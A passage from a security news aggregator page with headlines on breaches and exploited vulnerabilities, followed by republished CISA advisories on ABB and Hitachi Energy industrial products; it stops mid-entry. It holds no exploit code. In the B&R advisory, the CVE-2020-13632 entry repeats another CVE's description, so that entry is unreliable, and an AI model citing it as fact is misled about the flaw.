Breachbook

A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. [...]

The suspected cause is a private key compromise of one owner in the minting multisig account, said Blockaid.

Centralized data collection is a honeypot for hackers and organized criminals looking to target crypto holders and their families, according to Bitcoiners.

A supply chain attack targeting the Laravel Lang localization packages has exposed developers to a sophisticated credential-stealing malware campaign after attackers abused GitHub version tags to distribute malicious code through Composer packages. [...]

Apple, Meta, and Google offer special security modes that provide your devices more secure against targeted spyware attacks. Here are how those modes work, what they do, and how to switch them on.

Financial crime investigators in the Netherlands (FIOD) arrested two men and seized 800 servers linked to a web hosting company that enabled cyberattacks, interference operations, and disinformation campaigns. [...]

Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials.

According to users on X, the website was hijacked by hackers in an attempt to trick visitors into installing malware.

MARA spent $4.3 million on CEO Fred Thiel’s security in 2025, including vehicle armoring, as crypto wrench attacks increased globally.

Repeated bridge exploits and shrinking yields are making institutions question whether DeFi’s risks still justify the returns, says Symbiotic’s Putiatin.

The $10.7 million THORChain exploit was caused by a GG20 vulnerability, which allowed a malicious node to reconstruct a full private key to one of its vaults.

Japanese cybersecurity software company Trend Micro has addressed an Apex One zero-day vulnerability exploited in attacks targeting Windows systems. [...]

Ransomware and vendor breaches persist. The "2026 Data Breach Investigations Report" (DBIR) highlights how evolving social engineering tactics make the sector more vulnerable.

Drupal is warning that hackers are attempting to exploit a "highly critical" SQL injection vulnerability announced earlier this week. [...]

CVE-2026-0265 lets unauthenticated attackers forge a JWT and log in as any trusted user on CAS-enabled PAN-OS deployments. Bishop Fox built a detection tool that returns a definitive verdict from a single anonymous request, and breaks down exactly how the bug works and what to do about it.

Ubiquiti has released security updates to patch three maximum severity vulnerabilities in UniFi OS that can be exploited by remote attackers without privileges. [...]

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-9082 Drupal Core SQL Injection Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Polymarket said user funds and market resolution were safe after a suspected private key compromise tied to top-up operations.

The hacker behind the Verus bridge exploit returned 75% of the stolen funds as part of a recovery deal negotiated with the protocol days after the incident.

The advanced persistent threat group also relied on SOCKS proxies like SoftEther VPN, tunneling tools that act as a middleman between victim and attacker.

A sanitization bypass in Strapi 4.0.0 through 5.36.1 lets unauthenticated attackers extract an admin's password reset token character by character and take over the account. With over 20,000 internet-facing hosts exposed, Bishop Fox breaks down how the exploit works and how to remediate it.

TradFi views the breakup of its previously consolidated, centralized liquidity as a “serious structural threat,” said Tiger Research director Ryan Yoon.

CertiK reported earlier this month that criminal wrench attack teams usually consist of three to five people and are often made up of amateurs, while the masterminds are outside the country.

Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf, a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States.

First VPN promised hackers complete anonymity for their cyberattacks. But Europol said it was able to notify the service’s users that they have now been identified.

Modern crypto drainers don't hack wallets. They trick users into approving malicious transactions. Flare explores how the Lucifer DaaS platform scales wallet theft through phishing and automation. [...]

"Showboat" doesn't show off, but clearly it doesn't need to, as it's long helped China spy on small market communications providers.

A Chinese cyber-espionage campaign has been targeting telecommunications providers with newly discovered Linux and Windows malware dubbed Showboat and JFMBackdoor, respectively. [...]

Cisco has released security updates to address a maximum-severity vulnerability in Secure Workload that allows attackers to gain Site Admin privileges. [...]

Flipper Devices said that the new gadget is in development and the base model will cost under $350.

A virtual private network service called 'First VPN,' used in ransomware and data theft attacks, has been taken offline in a joint international law enforcement operation. [...]

The Underminr domain-fronting attack allows threat actors to modify Web requests and leverage trusted websites to cloak malicious activity.

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2025-34291 Langflow Origin Validation Error Vulnerability CVE-2026-34926 Trend Micro Apex One (On-Premise) Directory Traversal Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

View CSAF Summary ABB is aware of vulnerabilities in the product versions listed as affected in the advisory. An attacker who successfully exploited this vulnerability could cause the pollution of heap memory which potentially takes remote control of the product and performs a write operation to the flash memory to alter the firmware behavior. The following versions of ABB Terra AC Wallbox are affected: Terra AC wallbox (JP) <=1.8.33, 1.8.36 (CVE-2025-10504, CVE-2025-12142, CVE-2025-12143) CVSS Vendor Equipment Vulnerabilities v3 6.1 ABB ABB Terra AC Wallbox Heap-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Stack-based Buffer Overflow Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-10504 There is potential risk to pollute the memory when developing apps which has used to communicate with charger according to self-defined protocol if developers don’t strictly follow the field length which has not been validated in firmware. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) <=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at earliest convenience. Mitigation To attack with this kind of message, hackers must hijack Bluetooth first and then can send messages. Because the communication messages between BLE and charger have been encrypted. In theory, there is no way to attack the charger. Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C CVE-2025-12142 There is potential risk of polluting the BSS memory when developing apps which are used to communicate with charger via Bluetooth according to self-defined protocol if developers configure an unexpected length of bin files. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) <=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at earliest convenience. Mitigation To attack with this kind of message, hackers must hijack Bluetooth first and then can send messages. Because the communication messages between BLE and charger have been encrypted. In theory, there is no way to attack the charger. Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C CVE-2025-12143 There is potential risk of polluting the stack memory when developing a customized OCPP key of “Ran-domDelay“ in backend and configuring an unexpected number in the field. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) <=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at earliest convenience. Mitigation To attack with this kind of message, hackers must hijack Bluetooth first and then can send messages. Because the communication messages between BLE and charger have been encrypted. In theory, there is no way to attack the charger. Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 9AKK108471A8107 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2025-09-16 Date Revision Summary 2025-09-16 1 Initial version. 2025-09-28 2 DocumentID update 2025-09-28 3 Minor corrections 2025-10-09 4 CVSS update 2025-10-27 5 CVE update 2025-11-28 6 CVE update 2025-11-28 7 Fixed Version update 2026-05-21 8 Initial CISA Republication of ABB PSIRT 9AKK108471A8107 advisory Legal Notice and Terms of Use

View CSAF Summary Hitachi Energy is aware of the vulnerability, CVE-2022-4304 in the OSS component OpenSSL, that affects the GMS600 versions that are listed below. An attacker successfully exploiting this vulnerability could send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. For immediate mitigation /workaround information, please refer to the General Mitigation Factors/Workarounds The following versions of Hitachi Energy GMS600 are affected: GMS600 vers:GMS600/>=1.3.0|<=1.3.1 (CVE-2022-4304) CVSS Vendor Equipment Vulnerabilities v3 5.9 Hitachi Energy Hitachi Energy GMS600 Observable Discrepancy Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2022-4304 A timing-based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. View CVE Details Affected Products Hitachi Energy GMS600 Vendor: Hitachi Energy Product Version: GMS600 versions 1.3.0 and 1.3.1 Product Status: known_affected Remediations Vendor fix Upgrade to version 1.3.2 Relevant CWE: CWE-203 Observable Discrepancy Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments Hitachi Energy Internal Team reported this vulnerability to CISA Notice The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Support For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact-centers. General Mitigation Factors Recommended security practices and firewall configurations such as enforcing ingress IP allowlisting and applying traffic rate limiting in accordance with the operational security policy can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. SSVC SSVCv2/E:N/A:Y/2026-04-22T13:37:14Z/ Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000159 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2023-06-27 Date Revision Summary 2023-06-27 1 Initial public release. 2026-04-28 2 Updated fixed version. 2026-05-21 3 Initial CISA Republication of Hitachi Energy PSIRT 8DBD000159 advisory Legal Notice and Terms of Use

View CSAF Summary ABB became aware of vulnerability in the product versions listed as affected in the advisory. An update is available that replaces an outdated third-party component. Although no successful exploitation was observed during testing of the affected B&R products, the identified vulnerabilities could present potential attack vectors that might enable unauthorized access, data exposure, or remote code execution. The following versions of ABB B&R Automation Studio are affected: B&R Automation Studio <6.5, 6.5 (CVE-2025-6965, CVE-2025-3277, CVE-2023-7104, CVE-2022-35737, CVE-2020-15358, CVE-2020-13632, CVE-2020-13631, CVE-2020-13630, CVE-2020-13435, CVE-2020-13434, CVE-2020-11656, CVE-2020-11655, CVE-2019-19646, CVE-2019-19645, CVE-2019-8457, CVE-2018-20506, CVE-2018-20505, CVE-2018-20346, CVE-2018-8740, CVE-2017-10989, CVE-2016-6153, CVE-2015-6607, CVE-2015-5895, CVE-2015-3717, CVE-2015-3416) CVSS Vendor Equipment Vulnerabilities v3 9.8 ABB ABB B&R Automation Studio Numeric Truncation Error, Heap-based Buffer Overflow, Improper Restriction of Operations within the Bounds of a Memory Buffer, Out-of-bounds Write, NULL Pointer Dereference, Incorrect User Management, Use After Free, Integer Overflow or Wraparound, Improper Check for Unusual or Exceptional Conditions, Uncontrolled Recursion, Out-of-bounds Read, Improper Input Validation, Exposure of Sensitive Information to an Unauthorized Actor, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-6965 There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-197 Numeric Truncation Error Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2025-3277 An integer overflow vulnerability exists in SQLite's concat_ws() function that can lead to a massive heap buffer overflow. When triggered, the integer overflow results in a truncated size value being used for buffer allocation, while the original untruncated size is used for writing the resulting string, causing a heap buffer overflow of approximately 4GB. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2023-7104 A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C CVE-2022-35737 SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-15358 In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-13632 There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.0 5.5 MEDIUM CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-13631 SQLite before 3.32.0 allows a virtual table to be renamed to the name of one of its shadow tables, related to alter.c and build.c. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-286 Incorrect User Management Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C CVE-2020-13630 ext/fts3/fts3.c in SQLite before 3.32.0 has a use-after-free in fts3EvalNextRow, related to the snippet feature. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.0 7 HIGH CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2020-13435 SQLite through 3.32.0 has a segmentation fault in sqlite3ExprCodeTarget in expr.c. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-13434 SQLite through 3.32.0 has an integer overflow in sqlite3_str_vappendf in printf.c. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 5.5 MEDIUM CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-11656 In SQLite through 3.31.1, the ALTER TABLE implementation has a use-after-free, as demonstrated by an ORDER BY clause that belongs to a compound SELECT statement. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-11655 SQLite through 3.31.1 allows attackers to cause a denial of service (segmentation fault) via a malformed window-function query because the AggInfo object's initialization is mishandled. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2019-19646 pragma.c in SQLite through 3.30.1 mishandles NOT NULL in an integrity_check PRAGMA command in certain cases of generated columns. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2019-19645 alter.c in SQLite through 3.30.1 allows attackers to trigger infinite recursion via certain types of self-referential views in conjunction with ALTER TABLE statements. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2019-8457 SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2018-20506 SQLite before 3.25.3, when the FTS3 extension is enabled, encounters an integer overflow (and resultant buffer overflow) for FTS3 queries in a "merge" operation that occurs after crafted changes to FTS3 shadow tables, allow-ing remote attackers to execute arbitrary code by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases). This is a different vulnerability than CVE-2018-20346. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-190 